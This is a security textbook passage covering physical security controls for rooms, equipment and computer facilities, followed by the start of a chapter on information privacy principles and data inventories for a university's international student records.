A U.S. sweep of the Moscow embassy in 1945 had turned up a staggering 120 hidden microphones, planted in the legs of newly delivered tables and chairs, plaster, everywhere….In 1945, Soviet schoolchildren had presented the American ambassador with an elaborate hand-carving of the Great Seal of the United States. The carving hung in the ambassador's home office for seven years, until U.S. officials discovered a tiny bug, called "Golden Mouth", hidden deep in the wood that allowed the Soviets to eavesdrop on the ambassador at will. – Nicole Perlroth, author, This Is How They Tell Me the World Ends, and NY Times cybersecurity writer [1, page 70]

Physical security may be overlooked because it is not as complex or interesting as technology security. Assets are things of value: computer devices, equipment, and files; non-computer devices, equipment, and paper files; or other valuables such as money, checks, art, chemicals, prototypes, and ideas on boards. Of organization-reported security breaches, one major cause involves lost, misdelivered or stolen media, documents, and faxes [2]. Skimmers remain a concern for Point of Sale and ATM machines. All of these physical issues involve, or could involve, breaches of data protected by law or PCI DSS.

The Sensitivity and Criticality classes have served us well in other chapters, simplify security designs, and deserve to be used here too. It is always a good idea to draw a map showing the sensitivity of various rooms. In Step 2, we consider and plan confidentiality/integrity controls for rooms containing sensitive materials or devices, and in Step 3 we consider critical resources, to improve availability.

9.1 Step 1: Inventory Assets and Allocate Sensitivity/Criticality Class to Rooms

Physical attacks can impact confidentiality and integrity, and environmental conditions may impact availability. In the Information Security chapter, we rated assets using a sensitivity classification that included proprietary, confidential, privileged, and public classes. This classification ensures confidentiality and integrity through need-to-know and least privilege. In the Business Continuity chapter, we assigned a criticality class (addressing availability) to important assets, and rated them critical, vital, sensitive, and nonsensitive, depending on the loss we would incur if the assets or data were not available for a period of time. Instead of re-inventing the wheel, why not continue to use these classification systems, already developed, in our goal of physical security? Basically, we define room classifications, including how each class should be handled – and then we assign each room a classification. Our first step is to understand the value of what is in each room, along with the purpose of the room and its assets (Table 9.1).

Figure 9.1 then draws a map of a floor of a building and assigns a sensitivity and criticality class to each room, where the sensitivity class is color-coded. This may be useful for guards to understand their duties. Physical security designs should continue to develop the Defense in Depth concept. When evaluating physical security controls, we should consider both quantity, including cascading controls (multiple sequential defenses), and quality, including whether controls are preventive, detective or corrective in nature. Now that you have a good idea how to design physical security, let's discuss the different types of controls you can select from, concerning confidentiality/integrity, then availability.

Table 9.1  Allocation of assets (workbook exercise)

Room 124 (public classroom): Privileged, vital/sensitive. Assets: computer, projector, display. (Vital during the school year; sensitive otherwise.)
Room 128 (public classroom): Privileged, vital/sensitive. Assets: lab equipment, computer, projector, display.
Room 129 (office): Confidential, non-sensitive. Assets: exam/homework papers, laptop, display.
Room 130 (public classroom): Public, non-sensitive. Assets: tables, chairs.
Room 132 (server room): Confidential, critical. Assets: servers, network equipment, disk and tape drives.

Fig. 9.1  Physical security map (workbook exercise)

Table 9.2  Sensitivity class handling (workbook exercise)

Proprietary (room contains proprietary information storage): All cabinets remain locked. Room remains locked when not attended. No visitors are allowed in these areas.
Confidential (room contains confidential information storage): Door always locked, with two-factor authentication (key-card and password). Badges must be visible. Visitors must be escorted.
Privileged (room contains end-user computer equipment, PoS devices or controlled substances): Computers and PoS devices are physically secured using cable locking or another lock-down mechanism. PoS devices are inspected daily for tampering/replacement. Controlled substances are locked in cabinets. Doors are locked between 9 PM and 7 AM and on weekends, unless class is in session. (Specific rooms may have other lock hours, unless attended by the owner.)
Public (the public is free to spend time in this room, without escort): Unlocked rooms are periodically monitored by guards on a per-shift basis. Specific rooms may be locked during evening/night hours.

9.2 Step 2: Selecting Controls for Sensitivity Classifications

Table 9.2, Sensitivity Class Handling, shows example controls related to confidentiality and integrity. In Table 9.2, only the two high-priority sensitivity classes are detailed, but all should be described.

Controls related to confidentiality and integrity include controlling access (access control) to buildings, rooms, computers and other equipment, and documents. Least privilege dictates that people should have access to information or equipment only if their primary job responsibilities require it. However, some organizations are in the business of serving the public (e.g., gas stations, stores, libraries, schools, and Internet cafes) and offer the public access to payment card readers, computers, or IT networks. They need additional physical protections. We review each of these in turn.

9.2.1 Building Entry Controls

A few general rules of security are to ensure that your vicinity and grounds are safe and that you screen all entrants into your building/office area [4]. Your vicinity can be selected to be reasonably close to police, fire department, or a hospital, if your industry is prone to require any of them. You can select the location to be in a quiet spot with limited access or a busy spot with high public visibility. The grounds should be well lit at night where you want people to walk. You should guide people to one, or a limited number of, entrances, where you can screen people and have visitors log in and out. It is possible to establish a map with security zones of your grounds: controlled, security, and public [4].

Crime prevention is subtly used to guide – and manipulate – people to proper behavior in external security. To prevent crime, security uses the defenses of good visibility and public observation. For example, secured doors/windows should be sufficiently well lit at night to discourage attackers. Avoid trees and higher bushes around any doors, which could enable hiding. Clearly observable CCTV cameras, public benches and picnic tables in key locations provide unwelcome witnesses to potential criminals. Similarly, office windows that overlook the parking lot help to prevent crime.

Friendly props, labels and sidewalks can be used to guide people to front entrances and away from side entrances or windows. For example, the use of shrubs, flowers, and other landscaping tells people "do not walk here", while sidewalks announce "please walk here". Shrubs should be sufficiently low, below 2.5 feet (or less than 1 m), to ensure visibility. Parking is best located just outside the front door. Signs can be used to attract the public, while the lack of signs tells the public "boring – ignore me." Creating a friendly atmosphere gives the location a community feeling, where people feel responsible for each other and will help each other, if necessary. People need to feel safe, and good lighting and visibility help to achieve that. Trees are pleasant and can help to provide the community feeling, but should not hinder visibility where security is an issue.

9.2.2 Room Entry Controls

Considering an example story of defense in depth, let us assume an intruder has social-engineered her or his way past the front desk, for example by saying he is a computer repair person. The uninformed guard told him where the computer room is, without calling an IT representative first. Let's look at room controls.

Some door locks are better than others. For example, a key lock cannot track entrants, lets people in regardless of time of day, and can easily be circumvented by stealing or copying a key. Other types of door locks include electronic (key card), combination (numbers), and biometric (discussed in the Information Security chapter). The best systems are two-factor or multifactor. Issues to consider with door locks include [3, 4]: Can it track who entered at which times? Can it prevent entry by time of day for particular persons? Is it prone to error, theft, or impersonation? How expensive is it to install and maintain? If power fails, should it fail open or closed? A fail-secure policy fails locked, but if there is a fire, people must be able to exit. The decision should be considered carefully.

Alternatively, an intruder may enter past the front guard via piggybacking. Piggybacking is a means whereby our intruder gains entry by following along with people who are credentialed (by hiding behind others, or pretending to be credentialed and/or to be a friend of someone credentialed). Deadman or mantrap doors are an especially safe way to prevent piggybacking [3]. These include a double set of doors, where the space between the doors can only hold one person. A person enters the first door and must shut it before the second door can open.

Additional room entry controls may include walls, security cameras, motion sensors, security alarms, and guards or patrols. For very high security applications, windows can be reinforced [4]. Tempered glass, acrylics, and wired glass are stronger than regular glass. Regular glass can be made somewhat stronger by applying a film to darken windows and reduce shattering. Door hinges should also be attack-proof. Room entry control procedures may include escorted visitors and employee badges.

To continue our intruder story, unfortunately our organization can't afford guards or security cameras for the IT data center. The intruder hides out and waits for 7 PM, when most people have left. Then he bypasses the door locks by using climbing equipment to enter the computer room through the ceiling panels. Hopefully we have good computer controls.

9.2.3 Computer and Document Access Control

This section discusses controls you may take if your equipment is generally handled by employees or trusted volunteers. The suggestions in this section are requirements for confidential information, and many are requirements for HIPAA adherents. Computer access guards include engraved serial numbers, encrypted disk drive(s), encrypted copiers, and disabled disk or USB/disk interfaces. All organization equipment over a given price should be labeled with serial numbers and tracked in a database or spreadsheet.

Serial numbers can be engraved or labeled with tamper-resistant tags specifying the company name (see Fig. 9.1). An equipment inventory should be taken regularly.

Device theft recovery solutions can be installed on computers, which enable law enforcement to quickly locate stolen computer equipment. If your computer is stolen, you log into the vendor's web site and turn on the activate function. According to vendor web pages, features may include using the computer's camera to record the image and voice of the next person to use the equipment, or locking out the thief and erasing all data. This software may also provide location information, if not an IP address that law enforcement can track. Not only might you get your computer back, but the thief gets prosecuted!

Encrypted disk drives (and their backups) are required to protect personal data, as described in the chapter on Information Security. Laptops and other mobile devices are especially prone to loss and theft. If disks are not encrypted, then it may be tempting to encrypt specific files. However, the password cannot be forgotten, or the file(s) may be lost forever… This is also a problem if the person who created the encrypted files leaves the organization.

Commercial copy machines, which can make multiple copies of large documents, contain disk storage sufficiently large to retain many documents. These digital copy machines store documents when they copy, scan, fax, print and email documents. This retention of data is a concern when data is sensitive, since copy data may be accessed via the Internet or if the disk is stolen. In this case, the Federal Trade Commission recommends using copiers with extra security features, including encrypted disks and an overwrite feature [6]. The overwrite feature writes random data over copy files either on a schedule (e.g., daily or weekly) or after each job run. Remember that encryption is a viable defense under U.S. state breach laws, in case your copy machine disk disappears with confidential data. An alternative or additional control is to specify in the copy machine contract that when the copy machine is returned, either your organization keeps the disk(s) or the disk(s) are securely destroyed. A notice to this effect should be affixed to the copy machine. Accessing copy disks should be done by a professional, since they are often closely integrated into the copy machine; improper handling can break the machine.

Computers should be protected so that passers-by cannot access other employees' terminals – potentially by viewing, keyboarding, and/or saving data off to a USB flash drive. Controls to prevent onlookers include monitor hoods or privacy monitors, or simply placing the terminals where they cannot be easily viewed by visitors. Lockout function keys or screensaver timeouts can force an employee to log in after not using the computer for a period, such as when walking away. USB flash drives and CD/DVD drives can be disabled. If USB drives are not disabled or the computer is portable, antivirus software is important to minimize the probability of malware [7]. Sensitive documents should be shredded upon disposal. A clean desk policy and locked files can ensure that proprietary or confidential papers will not be lying around for onlookers to see.

To finish the intruder story, our intruder has entered the computer room and is looking for the proprietary information server. The servers are in cabinets, which are not locked – hooray!

He powers servers down, and uses a prepared USB flash drive to reboot different computers to the operating system provided on the USB. In some cases he succeeds, and then begins to peruse the server disk contents. Darn, the contents are encrypted and he can't get in [7]!!! It probably isn't worth taking the disks, since most likely the disk he is looking for will be encrypted. The whole trip may be wasted! No, he may still succeed… He installs a wireless access point and connects it to a network outlet, testing it out before he leaves. Yes, internal access! He also leaves around an unmarked DVD and flash drives with Trojan horses on them. For sure someone will pick them up and want to see what is on them… Stay tuned for tomorrow's episode.

9.2.4 The Public Uses Computers

Some organizations may have rooms open to the public that contain computers – either employee computers or computers available for use by the public. In addition to the controls specified in the previous sections, additional precautions can prevent theft and malware takeovers. Theft results when whole computers, or parts of them, disappear. Figure 9.2 shows how a padlock can be used to lock the backside of a computer, preventing important computer cards or other components from 'walking away'. If the lock is used in combination with a bike cable, the computer can be physically tethered to a permanent fixture in the room.

Fig. 9.2  Computer is padlocked and tethered

Table 9.3  Allocating controls to rooms (workbook exercise)

Rm 123 (Privileged, Vital; computer lab: computers, printer): Cable locking system. Doors locked 9 PM–8 AM by security.
Rm 125 (Privileged, Vital; classroom: computer & projector): Cable locking system. Teachers have keys to the door.
Rm 132 (Confidential, Critical; servers and critical/sensitive information): Key-card entry with password logs personnel. Badges required.

Publicly used computers are very prone to malware. Computers can be imaged so that all stores to disk (if available) are temporary. In this scenario, every power-up results in the same unmodified standard configuration. While this does not prevent malware infestations, it clears the malware every time the computer is rebooted. One issue is that if the imaged computer can be broken into via the Internet, the malware can be reinstalled day after day. This could occur if the computer is not configured properly for security or a login password becomes known. Ensuring that the image is recently patched will help to prevent intrusions. For example, Microsoft Windows ordinarily releases patches on the second Tuesday of each month (on "Patch Tuesday") at 10 AM Pacific Time, but may release a critical patch on an unscheduled basis.

Physical security controls can be documented in table form and/or map form. One advantage of the table form is that specific controls for individual rooms can be added to Table 9.1, giving Table 9.3. In the case of the university, there are more individual room situations than easily fit into the three defined sensitivity classes. Thus, there is a choice between defining more sensitivity classes (e.g., Privileged, Public) or allocating control descriptions for individual rooms. Defining too many sensitivity classes can make the classes difficult to remember. Table 9.3 can list all non-public rooms, or list only special handling requirements. For ease of use, Table 9.3 is mainly concerned with Sensitivity controls (not Criticality), since guards are generally concerned only with the Sensitivity class controls.

9.3 Step 3: Selecting Availability Controls for Criticality Classifications

Problems relating to availability include issues with electricity, water, fire, temperature and humidity. Table 9.4, Criticality Class Handling, shows example controls to ensure availability or reliability. In Table 9.4 only the two top availability-related classes (Critical, Vital) need be described, but others can be. Problems with electricity can include lost, reduced, or unsteady electrical current [3]. A blackout is a total loss of power, which can occur for shorter or longer durations.

Table 9.4  Criticality class handling (workbook exercise)

Critical (room contains critical computing resources, whose functions cannot be performed manually): Availability controls include temperature control, UPS, smoke and water detectors, fire alarm, fire suppressant, and an emergency power-off switch inside/outside the door.
Vital (room contains vital computing resources, whose functions can be performed manually for a short time): Availability controls include a surge protector, temperature control, and a fire extinguisher.

Irregular power levels can cause damage to computer equipment, including crashes. Such power fluctuations include a brownout, which is a consistently reduced power level, and sags, spikes and surges, which are momentary changes in electrical levels. Power levels may fluctuate due to high-period use (e.g., very hot days); electromagnetic interference (EMI) caused by electrical storms; or sharing electrical circuits with departments that vary their electrical usage [4]. Therefore, it is a good idea to have data centers on their own circuits.

Fortunately, equipment to protect computers is relatively cheap. A surge protector regulates electrical surges for durations measured in milliseconds, by sending excess current to ground [3, 4]. Voltage regulators or conditioners provide a nice steady power stream. An Uninterruptible Power Supply (UPS) provides regulated power with battery backup for about 30 minutes, depending on battery supply. More expensive power generators are required to extend electrical power beyond 30 minutes, including for hours or days.

An Information Processing Facility (IPF, or computer room) should have a number of additional availability controls [3, 4]. Smoke detectors can warn of fire, and should be placed above and below ceiling tiles, and under the room floor. Detectors are placed at the highest point in each enclosure (e.g., attached to the underside of the floorboard). Manual fire alarms and fire extinguishers should also be available within 50 feet of electrical equipment. Fire extinguishers should be tagged and inspected annually. Alarms should sound locally, at any monitored guard station, and preferably at the fire department.

Water detectors are useful if natural or manmade flooding is possible, or if water is used as a fire suppression system anywhere in the building. Water is particularly dangerous in an IPF due to electrical shock; people should be trained for handling such risks. Water detectors should be placed under raised floors at the lowest point in that enclosure (e.g., on the ground below the floorboard) and their locations should be marked on the floor. An emergency power-off switch is useful to turn off power to all equipment if a fire or flood occurs. There should be a switch both inside and outside the IPF room.

Air conditioning prevents computer overheating, which can result in computer malfunctioning in the short term, and shorter equipment lifespan over the long term. Your equipment manufacturer can provide exact specifications for your computer equipment, but ASHRAE standards currently recommend that computer equipment be maintained between 64.4 and 80.6 °F and 20–80% relative humidity [5].

High and low humidity can cause corrosion or static electricity, respectively. Antistatic bags and flooring can protect electrical equipment from static discharge when equipment is carried around [4].

Some fire suppression systems are safe and some are dangerous – to equipment or to human beings. The safe suppression systems include those that don't kill people or damage equipment, like FM-200 or Argonite. FM-200 cools equipment down, lowering the risk of combustion, while Argonite is a life-friendly gas. Fire suppression systems that are dangerous to humans include carbon dioxide and halon. While these gas systems do not damage equipment during a fire, they do displace oxygen and thus require lead time for people to exit. Halon was also banned due to its damage to the ozone layer.

Water sprinklers are popular, but water tends to damage computer equipment. Although water is safe for humans, water conducts electricity well. Therefore, power should be turned off before a water sprinkler is discharged [4]. Air conditioning should simultaneously be turned off, since oxygen fuels fires. With Wet Pipe (or Charged) water sprinklers, pipes always carry water and can break or leak, while Dry Pipe systems carry water only when a fire is detected. Thus, Dry Pipe is safer in northern environments, where pipes could freeze.

The computer room is best located on a middle floor [3]. If the floor is too low, it is prone to break-ins and flooding, while if it is too high, the fire department cannot easily reach the floor to put a fire out. The fire department should inspect the room annually. Policies should state that there is no smoking, food or water in the IPF. The IPF should be configured with fire-resistant walls, floor, ceiling, furniture, and electrical panel and conduit. Walls should have a two-hour fire resistance rating; in general, thicker walls have better ratings [4]. Redundant power lines reduce the risk of environmental hazards.

An auditor would observe that some sample controls are in place [3]. They should test sample batteries and handheld fire extinguishers, and ensure the fire suppression system is to code. They may inspect documentation, including policies and the physical security plan.
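As a small illustration of monitoring a computer room against the ASHRAE ranges quoted above, here is a sketch. The read_sensors() function is hypothetical, standing in for whatever monitoring hardware an IPF actually uses; a real system would raise an alarm rather than print.

    # Environmental monitoring sketch: alert when the computer room
    # drifts outside the recommended operating ranges cited above.
    TEMP_RANGE_F = (64.4, 80.6)      # ASHRAE-recommended temperature, °F
    HUMIDITY_RANGE = (20.0, 80.0)    # ASHRAE-recommended relative humidity, %

    def read_sensors() -> tuple[float, float]:
        """Hypothetical stand-in for a real sensor interface."""
        return 82.1, 55.0            # (temperature °F, relative humidity %)

    def check_environment() -> list[str]:
        temp, humidity = read_sensors()
        alerts = []
        if not TEMP_RANGE_F[0] <= temp <= TEMP_RANGE_F[1]:
            alerts.append(f"Temperature {temp} F out of range: overheating risk")
        if not HUMIDITY_RANGE[0] <= humidity <= HUMIDITY_RANGE[1]:
            alerts.append(f"Humidity {humidity}% out of range: corrosion/static risk")
        return alerts

    for alert in check_environment():
        print(alert)                 # in practice, page staff or sound an alarm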

9.4 Questions and Problems

1. Vocabulary. Match each meaning with the correct vocabulary.

Voltage regulator, FM 200, Uninterruptible power supply, Deadman door, Emergency power-off switch, Wet pipe

(a) A double set of locked doors prevents piggyback entry.
(b) A device which eliminates power sags and surges.
(c) A fire suppression system that sprays water, but may freeze in cold-temperature climates.

(d) A fire suppression system that releases a life-friendly agent, which cools equipment down and lowers the rate of combustion.
(e) A technique to turn off power to all equipment.
(f) A device which provides regulated power with battery backup for about 30 min.

2. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook (at https://sn.pub/lecturer-material), Physical Security Chapter, to complete the tables. For each table, include five or more information or asset types, and three roles.
(a) Create a 'Sensitivity Class Handling' Table, similar to Table 9.2.
(b) Create a 'Criticality Class Handling' Table, similar to Table 9.4.
(c) Create a Map, similar to Fig. 9.1. This map may be small but should contain representative types of rooms that would be used in this industry.
(d) Create an 'Allocating Controls to Rooms' Table, similar to Table 9.3.

3. Product Evaluation. Select one security product to evaluate: CCTV, UPS/voltage regulator, fire suppression system, location-based software, encrypted copy machine, door locks, or point-of-sale devices. Look up different websites for this one security product, and select three products to evaluate. What security services do they appear to provide, and for what price?

4. Regulation relating to Physical Security. Consider one of the following security regulations or standards from your nation. What requirements do they have related to Physical Security? Some websites provide government- or standards-based information, and thus are authentic sources of information. Consider these sites if in the United States:
(a) General Data Protection Regulation: https://gdpr.eu (European Union) or Chap. 17
(b) HIPAA/HITECH: www.hhs.gov (Health and Human Services) or Chap. 19
(c) Gramm–Leach–Bliley/Red Flags Rule: www.business.ftc.gov (Federal Trade Commission)
(d) Sarbanes–Oxley: www.isaca.org or www.sans.org (organizations for standards/security)
(e) PCI DSS: www.pcisecuritystandards.org: Requirements and Security Assessment Procedures v. 4.0
(f) FISMA: www.nist.gov (National Institute of Standards and Technology)

9.4.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.

Case study: Designing physical security. Health First Case Study: √. Other resources: Security Workbook, GDPR or HIPAA notes.

References

1. Perlroth N (2020) This is how they tell me the world ends. Bloomsbury Publishing, New York
2. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise.com/DBIR/2013. Accessed 20 Oct 2013
3. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 189–192, 381–386
4. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill Co., New York, pp 427–499
5. ASHRAE (2011) Thermal guidelines for data processing environments – expanded data center classes and usage guidance. American Society of Heating, Refrigerating and Air-Conditioning Engineers, Inc, www.ashrae.org
6. FTC (2010) Copier data security: a guide for businesses. Federal Trade Commission, pp 1–6. business.ftc.gov. November 2010
7. Conklin WA, White G, Williams D, Davis R, Cothren C (2011) CompTIA security+ all-in-one exam guide, 3rd edn. McGraw-Hill Co., New York, pp 581–595

Chapter 10

Attending to Information Privacy

If it’s free, you’re probably the product. – David Kelleher 2014 [1]

…for now know that every border you cross, every purchase you make, every call you dial, every cell phone tower you pass, friend you keep, site you visit, and subject line you type, is in the hands of a system whose reach is unlimited but whose safeguards are not. – Edward Snowden, CITIZENFOUR trailer

The $200 billion data broker industry results in the collection and storage of nearly every U.S. household and commercial transaction. The FTC found one data broker firm possessed 1.4 billion consumer transactions, while another held data tied to $1 trillion in consumer spending. A third broker had 3,000 separate pieces of data for nearly every U.S. consumer. – Jessica Davis, Senior Editor Healthcare, SC Magazine [3]

Whether you purchase through the internet or via credit card in physical stores, your purchases are recorded. Using data analytics, companies have discovered patterns in these records. One pattern Target recognized in 2012 is whether a woman is pregnant, signaled by purchases of unscented lotion, followed by vitamins, and finally scent-free soap and cotton balls [2]. Recognizing the pattern, Target advertised products for new mothers to these women. One father got upset that his teenage daughter was being advertised to in this way and complained to Target, then later apologized when he found out the prediction was true. While it may be convenient to be advertised products we are likely to buy, it may also make us uncomfortable that industry knows so much about us. It is worth reiterating Edward Snowden’s statement from his CITIZENFOUR trailer: “…for now know that every border you cross, every purchase you make, every call you dial, every cell phone tower you pass, friend you keep, site you visit, and subject line you type, is in the hands of a system whose reach is unlimited but whose safeguards are not.”

While advertising may be a relatively minor issue, privacy can become a serious concern. Consider, for example, a woman choosing an abortion, who lives in a state or nation where it is illegal but travels to a state or nation where it is legal. Her privacy expectations may be that the state does not know what she is doing when outside that state (excessive authorization) and, in fact, that the state has no right to monitor her every move (surveillance). With or without her traveling, if there is a natural miscarriage, the state may assume an abortion (inaccurate data),


resulting in a distracting court case, a forced public discussion of her pain at losing the child (induced disclosure), and embarrassment over the public charge (stigmatization). Or perhaps hacktivists break into the hospital’s or abortion clinic’s data and sell the information to the state and news media (breach). Even if her identity is hidden in organizational files, her data may be exposed (re-identification) if the aggregated data sets do not sufficiently hide personal data (revealed data), which could happen if her zip code is rare within the organization. Then there is the state’s perspective: it may feel it has a right to this confidential data (restricted data). These issues [4] are a concern not only in this case, but also for medical, psychological, legal, and personal issues of hardship, such as poverty or sickness. Referencing these privacy concerns can be helpful when completing a risk analysis.

Privacy relates to the existence of an informational boundary between one person and others. NISTIR 8062 defines ‘security’ as “… unauthorized activity that causes a loss of confidentiality, integrity or availability of information or systems” [5, p. 8]. In contrast to security, privacy is concerned with the effects (intended or unintended) of authorized processing on an individual’s privacy. The effects of technology can impact people’s lives and society in poorly understood ways. As demonstrated by the story of the woman who might choose an abortion or lose a baby, these losses can include loss of trust in the system, loss of self-determination, financial loss, and discrimination/stigmatization.

Any information that can be attributed to an individual, whether alone or in combination, is often referred to as Personally Identifiable Information (PII). Privacy and security together ensure that only authorized processing of PII occurs (security) and that this authorized processing impacts lives only in personally acceptable ways (privacy).

At a high level, the governance process to design data privacy includes: identifying all personal information in the organization that falls within privacy guidelines; identifying applicable legal and regulatory requirements; creating appropriate policies, procedures, and guidelines to protect privacy; and implementing those policies [4]. (From the Chap. 6 discussion of governance, remember that policies are executive-level organizational mandates, procedures are detailed, step-by-step processes, and guidelines are recommendations.)

10.1 Important Concepts and Principles

Defining terms is an important first step. Data is considered digital information, whereas information is defined as content that can be in hard copy, audio, visual, written notes, and/or digital forms [4]. The person about whom the data is stored is called the data subject, and the organization or entity storing the data is called the controller (from the European Union’s General Data Protection Regulation) [9].

If security is concerned with confidentiality, integrity and availability, privacy engineering may be concerned with disassociability, predictability, and manageability [5]. Disassociability ensures information cannot be attributed to a single identity, beyond what is necessary for processing. It ensures that privacy is preserved through minimal exposure even during authorized access. Predictability can be translated into reliable trustworthiness, which enables users and owners to trust the


system. Trust is earned through transparency, arising from clear communication to data subjects about how their data will be used, and accountability, which is the consistent implementation of this policy. Manageability allows for ‘granular administration’ of ‘selective exposure’, changes, and purging of PII [5], and is concerned with the accuracy of information and fair treatment of data subjects.

Data quality is the usefulness of data to a consumer [11]. It measures the accuracy and completeness of the data. Data can be ill-calibrated and flawed: statistics may be used to present false information in order to make a sale or gain economic advantage. Data quality should be the measure of confidence the user has in the data. However, the data a consumer wants may not match the data a provider is willing to provide, for security risk reasons. Accuracy and quality ensure that data fulfills its requirements, including [4]:

• Quality: Fits the purpose for which it will be used. Includes: complete, unique, timely, valid, accurate, consistent.
• Accurate: Data must match its real-world object.
• Consistent: Data content matches its definition consistently across objects.
• Valid: Data content matches its contextual type.

Other important principles related to data privacy include [5, 9, 16]:

Purpose limitation: Data is collected and used only for its explicitly defined intention; however, it may also be used for approved public interest or research purposes. This is also known as Purpose Specification.
Data minimization: Only the minimum, necessary data is collected and used to fulfill the defined (or legally authorized) purpose.
Storage limitation: Data is not retained for longer than necessary, although archival may be possible for public interest or statistical purposes.
Individual Participation: Individuals have the right to know how their information will be created and used, to consent to this use, and to have their privacy issues resolved.
Access and Amendment: Individuals have the right to see their records and an opportunity to correct them.
Confidentiality and Integrity: Data shall be processed in a secure way, e.g., by providing only authorized access to data.

Organizations have the following responsibilities in implementing these privacy policies [7]:

• Authority: An organization may collect, process or use PII only if it has been granted the authority to do so, and shall indicate, via notification, from where that authorization was granted.
• Transparency: Organizations shall provide clear and accessible notices as to the PII they collect, and how the information is collected, used, processed, stored, and disseminated, and to whom it may be released.
• Accountability: Organizations are responsible for documenting privacy policies and training employees, then confirming via documented audit that data privacy practices are followed.


Data privacy notifications may reassure customers, but they may also be required by law. With the passage of privacy laws (e.g., GDPR, CCPA, HIPAA, Japan’s Protection of Personal Information), privacy is a recent arrival within security. This general section plans for the implementation of data privacy, including (1) tracking data (data purpose, inventory), (2) privacy impact assessments and controls (de-identification, data life cycle, data persistence) and (3) documentation (privacy notices, consent forms).

The Information Security chapter’s data classification tables define how data is to be handled, addressing permissions, media storage, labeling and handling, transmission, migration, data warehousing, archive and retention, and disposal and destruction. These are all important aspects of the data lifecycle, but classifying according to Sensitivity Class is not specific to any dataset: it does not track where the data is stored, what organizations have access to it, what contracts refer to it, or how specifically data was purged. Thus, knowledge refinement and documentation are important for specific privacy-protected data. In addition, there are new information and quality goals that need to be evaluated and documented as part of the data lifecycle, including data purpose, proper authorization for the processing and use of data, and tracking methods of processing data [4]. Designing privacy is useless unless the organization understands the full lifecycle of each PII dataset, and that cannot be done without a clear understanding of the data inventory.

The three steps of defining information privacy start with documenting all information that requires privacy protections, as part of a data dictionary. Step two involves performing a risk analysis, called a privacy impact analysis, that includes defining controls. Step three involves documenting a Notice of Privacy Practices, to communicate to clients their rights and privileges.

10.2 Step 1: Defining a Data Dictionary with Primary Purpose

The first step is to understand what data an organization has (or needs) and how and why it is used. This is also important in performing a Privacy Impact Assessment (PIA) and classifying information. Data is classified as part of the Information Security chapter, but now we extend (and potentially update) that table to add a primary purpose and other fields. A proper data inventory describes the types of personal data collected as well as compliance requirements.

To start that list, remember that information is generally retained in databases. Database development requires the definition of a data dictionary, which tracks how data tuples or records relate and what data attributes are contained in each record. A data dictionary generally includes metadata, which is a description of each record and data item (but not the contents). With multiple databases, it is helpful to have one metadata repository in a business, describing the full business information. This repository is called a business glossary: the complete, independent list of data that defines business usage for data. The business glossary also links data definitions to their source (e.g., a database), where the actual storage occurs. The data inventory is the entire collection: the business glossary plus the databases it describes. A minimal sketch of such an inventory record appears below.
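The following is a minimal, hypothetical Python sketch of how one business-glossary entry might be represented in code. The field names (title, owner, purpose, and so on) are illustrative choices modeled on the columns used later in Table 10.1, not a prescribed schema.

```python
from dataclasses import dataclass, field
from typing import List

@dataclass
class DataInventoryRecord:
    """One business-glossary entry: metadata about a dataset, not its contents."""
    title: str            # form or table name
    owner: str            # accountable data owner
    location: str         # source system where storage actually occurs
    purpose: str          # primary purpose justifying collection
    classification: str   # e.g., "Confidential" or "Private"
    retention: str        # how long the data is kept, and why
    attributes: List[str] = field(default_factory=list)  # data dictionary fields

inventory = [
    DataInventoryRecord(
        title="Financial Sponsorship Form",
        owner="Designated School Official",
        location="ISS Database",
        purpose="Government-required proof of funds for international study",
        classification="Confidential, nonsensitive",
        retention="Archived offline for 5 years for government review",
        attributes=["student name", "bank", "account total"],
    ),
]

# A simple query over the inventory: which datasets deserve PIA priority?
priority = [r.title for r in inventory if r.classification.startswith("Confidential")]
print(priority)  # ['Financial Sponsorship Form']
```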


The Einstein University data inventory includes forms required by International Student Services, which are manually or electronically signed, scanned, and archived for government verification purposes. Since these are PDF forms, it is important to also list the attributes required on each form. An example is shown in Tables 10.1 and 10.2.

Table 10.1 Data inventory for international student services at Einstein University (workbook exercise)
Department(s): International Student Services (ISS)
Location: ISS Database
Data owner: Designated School Official (DSO): Janet Gulbrandsen

Financial Sponsorship Form
  Purpose, description: Government-required documentation for international students to show they have sufficient funds to study in the U.S. for the full duration of the educational program. Archived for gov’t review.
  Life cycle (when created; last need): After admit; before the I-20 immigration document is issued for the Visa interview.
  Format: PDF
  Classification, rights, restrictions: Confidential, nonsensitive (contains financial information). Accessible to ISS staff only.

Curricular Practical Training (CPT) Application
  Purpose, description: Government-required documentation for international F-1 students to be eligible for practical training related to their major, before education ends. Archived for gov’t review. Regulation: 8 Code of Federal Regulations (CFR) 214.2(f)(10) and (f)(10)(i).
  Life cycle: May be created after 1 year of study in the U.S.
  Format: PDF
  Classification, rights, restrictions: Private, nonsensitive (resume-type information). Prepared by student, advisor, employer, DSO.

Optional Practical Training (OPT) Application
  Purpose, description: Government-required documentation for international F-1 students to be eligible for practical training related to their major, before or after education ends. OPT applicants must also apply to U.S. Citizenship and Immigration Services (USCIS). Archived for gov’t review. Regulation: 8 CFR 214.2(f)(10) through (13); 8 CFR 274a.12(c)(3).
  Life cycle: May be created after 1 year of study in the U.S.
  Format: PDF
  Classification, rights, restrictions: Private, nonsensitive (resume-type information). Prepared by student, DSO.

Exception to Full-Time Status
  Purpose, description: Government-required documentation for international students to study in the U.S. without being full time, explaining cause. Archived for gov’t review.
  Life cycle: May be created any semester of study in the U.S.
  Format: PDF
  Classification, rights, restrictions: Private, nonsensitive (educational-type categories). Prepared by DSO, student, advisor.


Table 10.2 Data dictionary for some international student services records (workbook exercise)

Curricular Practical Training (CPT) Application Form. Data attributes: Student name, major, degree program; Expected date of graduation; Visa status, passport expiration; Qualification for CPT; Academic department; Concurrent course taken; Student contact information, date and signature; Advisor contact information, date and signature; Start and end date for employment; Position title; Full-time/part-time status; Paid/unpaid status; Position description; Name of company; Employer contact information, date and signature.

Exception to Full-Time Status Form. Data attributes: Student name, date and signature; Student ID; Semester; Reason for being less than full time; Advisor name, date and signature; ISS advisor name, date and signature.

10.3 Step 2: Performing a Privacy Impact Assessment

